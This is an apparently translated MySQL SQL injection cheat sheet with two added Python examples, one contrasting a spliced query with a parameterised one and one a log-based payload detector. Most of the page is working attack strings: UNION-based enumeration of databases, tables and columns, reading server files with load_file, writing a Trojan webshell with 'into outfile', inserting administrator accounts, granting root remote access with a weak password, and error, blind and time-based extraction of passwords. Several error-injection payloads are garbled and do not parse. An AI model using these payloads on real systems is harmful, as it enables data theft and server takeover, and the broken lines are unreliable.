SELECT first_name, last_name FROM users WHERE user_id = '$id'
1. With id=1' or 1=1-- the query returns every row: "--" starts a comment, so everything after it is ignored. Note that in MySQL there must be a space after --.
The other comment sequences are # and /*.
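The query above with its $id spliced into the SQL string, as an added illustration that is not part of the original page: SQLite (in memory, with a constructed users table) stands in for MySQL so it runs offline, and it shows why the 1' or 1=1-- input from above returns every row, while binding the value as a parameter keeps it as plain data. SQLite also treats -- as a comment, though unlike MySQL it does not require the trailing space.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the page's users table (SQLite in memory, not MySQL).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "alice", "adams"), (2, "bob", "brown"), (3, "carol", "clark")])
    return con

def lookup_vulnerable(con, user_id):
    # The page's query with $id spliced into the SQL text: the value is parsed as SQL.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()

def lookup_safe(con, user_id):
    # Same query with a bound parameter: quotes and comment markers stay inside the value.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()

PAYLOAD = "1' or 1=1-- "   # the input from the page; "-- " comments out the trailing quote

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1"))        # one row, as intended
    print(lookup_vulnerable(db, PAYLOAD))    # every row: WHERE user_id = '1' or 1=1-- '
    print(lookup_safe(db, PAYLOAD))          # no rows: no user_id equals that literal text
```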
Contents:
0x00 MySQL General injection (SELECT)
0x01 MySQL General injection (INSERT, UPDATE)
0x02 MySQL Error injection
0x03 MySQL Boolean-based blind injection
0x04 MySQL Time-based blind injection
0x05 MySQL Other injection tips
0x06 MySQL Database version features
Body:
0x00 MySQL General injection (SELECT)
1. Comment characters
#
/*
--
2. Injection when spaces are filtered
Use /**/, () or + instead of spaces, or one of these URL-encoded whitespace characters:
%0c = form feed (new page)
%09 = horizontal tab
%0d = carriage return
%0a = line feed (new line)
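A log-side check for the space substitutes just listed, as an added example that is not part of the original page: it normalises a request's query string (URL decoding, the /**/ and + substitutes, the control characters above), then matches the payload families this page covers (union/select, information_schema enumeration, load_file and into outfile, benchmark/sleep, floor(rand()) and name_const, the ' or 1=1 tautology) over constructed access-log lines. The family names and the log format are assumptions for the example.

```python
import re
from urllib.parse import unquote_plus

# Whitespace substitutes from the page: /**/, '+', %09 %0a %0c %0d. Stripped before matching.
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_OPEN_COMMENT = re.compile(r"/\*.*$", re.S)   # the page's payloads end in a bare /*
# Payload families the page lists (names are ours), matched on the normalised text.
PATTERNS = {
    "union_select": re.compile(r"\bunion[\s(]+(all[\s(]+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(schemata|tables|columns)\b"),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b"),
    "time_based": re.compile(r"\b(benchmark|sleep)\s*\("),
    "error_based": re.compile(r"\bfloor\s*\(\s*rand\s*\(|\bname_const\s*\("),
    "tautology": re.compile(r"'\s*or\s+\d+\s*=\s*\d+|\bor\s+1\s*=\s*1\b"),
}

def normalize(raw):
    s = unquote_plus(unquote_plus(raw))   # %xx and '+' (twice, to undo double encoding)
    s = _BLOCK_COMMENT.sub(" ", s)        # /**/ standing in for a space
    s = _OPEN_COMMENT.sub(" ", s)         # trailing unterminated comment
    return re.sub(r"\s+", " ", s).lower() # tab, CR, LF, form feed -> single space

def classify(raw):
    return sorted(name for name, rx in PATTERNS.items() if rx.search(normalize(raw)))

# Constructed access-log lines (not real traffic); the last four carry payloads from the page.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /user.php?id=1 HTTP/1.1" 200',
    '10.0.0.5 - - "GET /user.php?id=1%27%20or%201=1--%20 HTTP/1.1" 200',
    '10.0.0.7 - - "GET /user.php?id=1/**/and/**/1=2/**/union/**/select/**/1,group_concat(schema_name),3/**/from/**/information_schema.schemata/* HTTP/1.1" 200',
    '10.0.0.9 - - "GET /user.php?id=1%09union%0aselect%0c1,load_file(0x633a5c626f6f742e696e69),3%0d-- HTTP/1.1" 500',
    '10.0.0.9 - - "GET /user.php?id=1170+union+select+if(1=1,benchmark(5000000,sha1(1)),0) HTTP/1.1" 200',
]

def scan(lines):
    # Returns (client, [families]) for each request whose query string matches a pattern.
    hits = []
    for line in lines:
        m = re.search(r'"GET \S+?\?(\S*) ', line)
        if m and (tags := classify(m.group(1))):
            hits.append((line.split()[0], tags))
    return hits
```

Matching after normalisation is what makes the substitutes irrelevant: the tab/LF variant and the /**/ variant both reduce to the same "union select" text.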
3. Displaying more than one row of data
concat()
group_concat()
concat_ws()
4. Related functions
system_user(): system user name
user(): user name
current_user(): current user name
session_user(): user name of the database connection
database(): current database name
version(): MySQL version
load_file(): reads a local file
@@datadir: data directory path
@@basedir: MySQL installation path
@@version_compile_os: operating system, e.g. Windows Server 2003
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
5. MySQL general injection statements
Guess the number of columns:
order by n/*
View basic MySQL information:
and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7/*
Query the databases:
and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1/*
and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata/*
Query the table names:
and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=<hex-encoded database name> limit 1,1/*
and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=<hex-encoded database name>/*
Query the columns:
and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=<hex-encoded table name> and table_schema=<hex-encoded database name> limit 1,1/*
and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=<hex-encoded table name> and table_schema=<hex-encoded database name>/*
Query the data:
and 1=2 union select <field 1>,5,<field 2>,7,8 from <database>.<table>/*
Determine whether you have file read/write permission:
and (select count(*) from mysql.user)>0/*
and (select count(File_priv) from mysql.user)>0/*
6. MySQL file read and write
Required conditions:
Read: the FILE privilege
Write: 1. the absolute path is known 2. union can be used 3. the single quote ' can be used
-------------------------Read----------------------
MySQL 3.x read method:
create table a (cmd text);
load data infile 'c:\\xxx\\xxx\\xxx.txt' into table a;
select * from a;
MySQL 4.x read method:
In addition to the method above, load_file() can also be used:
create table a (cmd text);
insert into a (cmd) values (load_file('c:\\ddd\\ddd\\ddd.txt'));
select * from a;
MySQL 5.x read method:
Both of the above work.
Tips for reading files (path given as char() or as hexadecimal):
load_file(char(32,26,56,66))
load_file(0x633a5c626f6f742e696e69)
------------Write--------------------------
Writing files with into outfile:
union select 1,2,3,char(<Trojan code converted to decimal or hexadecimal>),5,6,7,8,9,10,7 into outfile 'd:\web\90team.php'/*
union select 1,2,3,load_file('d:\web\logo123.jpg'),5,6,7,8,9,10,7 into outfile 'd:\web\90team.php'/*
0x01 MySQL General injection (INSERT, UPDATE)
MySQL's plain mysql_query() does not support multi-statement execution; mysqli does.
INSERT injection mostly uses error-based injection!
1. If you can insert directly, insert an administrator account directly:
insert into user (username,password) values ('xxxx','xxxx'),('dddd','dddd')/*');
2. If you can insert data that is then displayed on the web page, combine it with XSS and CSRF to obtain cookies or get a shell.
UPDATE injection: same as above.
0x02 MySQL Error injection
1. and (select 1 from (select count(*), concat((select (statement)) from information_schema.tables limit 0,1), floor(rand(0) x from information_schema.tables group by x) a) and 1=1
The (statement) is filled with an ordinary query, for example: select distinct concat(0x7e,0x27,schema_name,0x27,0x7e) from information_schema.schemata limit 0,1
2. and+1=(select+*+from+(select+name_const((statement),1),name_const((statement),1))--
3. update web_ids set host='www.0x50sec.org' where id=1 and (select 1 from (select count(*), concat(rand(0), (substring((select (statement)),1,62))))) (a from information_schema.tables group by a) b);
4. insert into web_ids (host) values ((select (1) from mysql.user where 1=1 and (select 1 from (select count(*), concat(rand(0) * *), (substring((select (statement)),1,62))) (a from information_schema.tables group by a) b)));
0x03 MySQL Boolean-based blind injection
Using ASCII:
and ascii(substring((select password from users where id=1),1,1))=49
Using regular expressions:
and 1=(select 1 from information_schema.tables where table_schema="blind_sqli" and table_name regexp '^[a-n]' limit 0,1)
0x04 MySQL Time-based blind injection
1170 union select if(substring(current,1,1)=char(one), benchmark(5000000,encode('msg','by 5 seconds')), null) from (select database() as current) as tbl
union select if(substring(password,1,1)='A', benchmark(100000,sha1(1)), 0) user,password from mysql.user where user='root
0x05 MySQL Other injection tips
To be updated when encountered later.
0x06 MySQL Database version features
1. The information_schema database is available from MySQL 5.0 onward.
2. From MySQL 5.1 onward, UDFs must be imported into the xx\lib\plugin\ directory.
3. From MySQL 5.x onward, system commands can be executed.
MySQL Injection summary